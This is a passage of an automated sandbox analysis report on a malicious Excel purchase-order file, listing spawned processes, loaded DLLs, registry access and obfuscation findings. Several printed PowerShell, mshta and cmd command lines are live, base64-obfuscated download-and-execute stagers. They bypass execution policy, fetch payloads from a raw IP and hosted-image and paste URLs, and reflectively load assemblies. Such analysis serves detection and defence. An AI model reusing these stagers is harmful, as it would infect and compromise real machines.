1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES367B.tmp" "c:\Users\user\AppData\Local\Temp\u10solcd\CSCB37CF81CE4334084B75C7031C6A4882F.TMP"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: NB PO-104105107108.xlsStatic file information: File size 1062912 > 1048576
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Binary string: .pdbrq source: powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.pdb source: powershell.exe, 00000008.00000002.478285781.0000000002FBE000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.pdbhP source: powershell.exe, 00000008.00000002.478285781.0000000002FBE000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.pdbhP source: powershell.exe, 00000014.00000002.519092403.00000000025E3000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.pdb source: powershell.exe, 00000014.00000002.519092403.00000000025E3000.00000004.00000800.00020000.00000000.sdmp
        Source: NB PO-104105107108.xlsInitial sample: OLE indicators encrypted = True

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjY